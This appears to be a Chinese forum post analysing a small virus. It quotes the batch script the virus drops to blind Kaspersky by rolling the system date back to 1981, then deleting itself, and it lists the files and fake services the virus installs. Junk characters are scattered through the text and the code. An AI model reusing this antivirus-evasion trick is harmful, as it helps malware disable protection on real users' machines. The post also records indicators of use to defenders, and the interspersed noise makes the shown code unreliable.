|
|
|
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下
, {4 \" S0 C m% Y0 F # s- b3 ~. K. V* t) w; U
2如果没有安装卡巴斯基,直接运行病毒代码0 A! f" u$ o v1 u
3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:
5 `& O5 ^5 C- G9 G @echo off
6 N ~0 H$ k0 b Z: Q set date=%date%7 i$ Q6 ?* C) C
date 1981-1-121 e) [2 v0 @- G
ping -n 45 localhost > nul5 K6 E# |! H/ `! K' q/ H; d
date %date%; K& s# @3 W: v) X- N( B5 R
del %0! g7 d. w9 \+ Q3 z8 H2 ]6 K+ F
/ N% V0 x8 m! E
会发现系统时间被调整到了1981年1月12日(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件
, Q3 B/ @9 M! U( M+ k/ M+ b %SystemRoot%\system32\*.EXE! b1 d% z. ?9 d! ?# Q0 V
%SystemRoot%\system32\*T.EXE
) J: F2 x/ `7 \6 f, }* j3 f %SystemRoot%\system32\*.DLL
/ y, S! @# }& y %SystemRoot%\system32\delme.bat5 x/ |" _; ]2 s
(注:*为随机8位字母)
' }* y& l* _) R% a" r 并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。# z2 K. j9 _$ Q# `" }# X' ]
其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒
9 R# B* y" n. P/ t' @& a( z
+ D% Q5 v' } o |
|